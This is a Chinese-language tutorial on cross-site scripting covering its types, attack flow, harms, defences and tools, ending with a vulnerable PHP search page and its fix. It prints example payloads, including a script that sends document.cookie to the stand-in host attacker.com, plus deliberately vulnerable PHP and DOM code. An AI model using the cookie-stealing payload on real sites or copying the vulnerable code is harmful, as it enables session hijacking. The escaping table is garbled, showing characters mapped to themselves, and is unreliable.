跨站脚本攻击（XSS）详解

跨站脚本攻击（XSS，Cross-Site Scripting）是一种通过在网页中注入恶意脚本，攻击用户浏览器的漏洞。攻击者可以利用XSS窃取用户敏感信息、劫持会话、或在受害者浏览器中执行恶意操作。

---

一、XSS的类型

1. 反射型 XSS（Reflected XSS）

• 特点：
  • 恶意脚本通过 URL 参数传递，受害者访问后立即触发。
  • 通常出现在搜索框、URL参数等直接输出到页面的地方。
• 实例：

  http://example.com/search?q=<script>alert('XSS')</script> 

  如果应用直接将q参数值显示在页面上而未过滤，就会触发XSS。

---

2. 存储型 XSS（Stored XSS）

• 特点：
  • 恶意脚本存储在服务器中（如评论区、消息板）。
  • 每次其他用户访问存储内容时，脚本会自动执行。
• 实例： 攻击者在评论区插入恶意代码：

  <script>document.location='http://attacker.com?cookie='+document.cookie</script> 

  当其他用户访问该评论时，浏览器会执行脚本，将其Cookie发送给攻击者。

---

3. DOM型 XSS（DOM-based XSS）

• 特点：
  • 恶意脚本直接利用浏览器的文档对象模型（DOM），而非服务器响应内容。
  • 常见于通过 JavaScript 操作 DOM 的动态网页。
• 实例： 一个动态网页的JavaScript代码：

  var search = location.hash.substring(1); // 获取URL中的hash部分 document.getElementById("output").innerHTML = search; 

  如果用户访问以下URL，可能触发XSS：

  http://example.com/#<script>alert('XSS')</script> 

---

二、XSS的实现过程

1. 注入恶意代码

• 攻击者在输入字段或URL中注入恶意脚本。
• 目标网页未对输入内容进行充分过滤或转义。

2. 恶意代码执行

• 浏览器在渲染网页时执行攻击者注入的代码。
• 可能的后果包括：
  • 窃取用户会话Cookie。
  • 模拟用户操作。
  • 重定向用户到恶意网站。

3. 数据传输

• 恶意脚本通过HTTP请求将窃取的数据发送到攻击者服务器。

---

三、XSS的危害

1. 窃取用户会话：

   • 攻击者通过获取受害者的会话Cookie，冒充用户身份登录。

   <script>document.location='http://attacker.com?cookie='+document.cookie</script> 

2. 伪造内容和操作：

   • 攻击者伪造网站内容，欺骗用户执行恶意操作（如转账、购买）。

3. 分发恶意代码：

   • 利用XSS传播木马程序或病毒。

4. 钓鱼攻击：

   • 注入伪造登录表单，窃取用户的账号密码。

---

四、防御措施

1. 输入过滤

• 对所有用户输入的数据进行严格验证：
  • 仅允许白名单字符。
  • 拒绝特殊字符（如<、>、"、'、/等）。

2. 输出转义

• 在将用户数据插入HTML、JavaScript、或CSS时，对特殊字符进行转义：
  • 使用HTML转义字符：
    • < 转义为 <
    • > 转义为 >
    • " 转义为 "
    • ' 转义为 '

3. 使用安全编码库

• 使用框架自带的防御机制：
  • 如：Java的 ESAPI，Python的 Jinja2，或PHP的 htmlspecialchars 函数。

4. 设置Content Security Policy (CSP)

• 配置CSP限制网页中可以执行的脚本来源。

  Content-Security-Policy: default-src 'self'; script-src 'self' https://trustedscripts.example.com 

5. Cookie安全设置

• 设置Cookie为HttpOnly和Secure，防止通过JavaScript访问Cookie：

  Set-Cookie: SESSIONID=abc123; HttpOnly; Secure 

---

五、攻击工具

1. BeEF（Browser Exploitation Framework）

• 一个专门用于浏览器攻击的工具，可以利用XSS漏洞执行各种操作。

2. XSSer

• 自动化的XSS检测工具，可扫描和利用XSS漏洞。

3. Burp Suite

• 专业的漏洞检测和利用工具，可以用来发现和测试XSS漏洞。

---

六、实例分析

漏洞代码

一个存在反射型XSS漏洞的示例：

<html>
  <body>
    <form action="search.php" method="get">
      <input type="text" name="q">
      <button type="submit">Search</button>
    </form>
    <?php
      echo "Search results for: " . $_GET['q'];
    ?>
  </body>
</html>

攻击演示

访问以下URL可触发漏洞：

http://example.com/search.php?q=<script>alert('XSS')</script> 

修复代码

使用转义函数对输出进行过滤：

<?php echo "Search results for: " . htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8'); ?> 

---

通过及时识别和修复漏洞、使用安全编码实践和部署防御技术，可以有效预防XSS攻击的发生。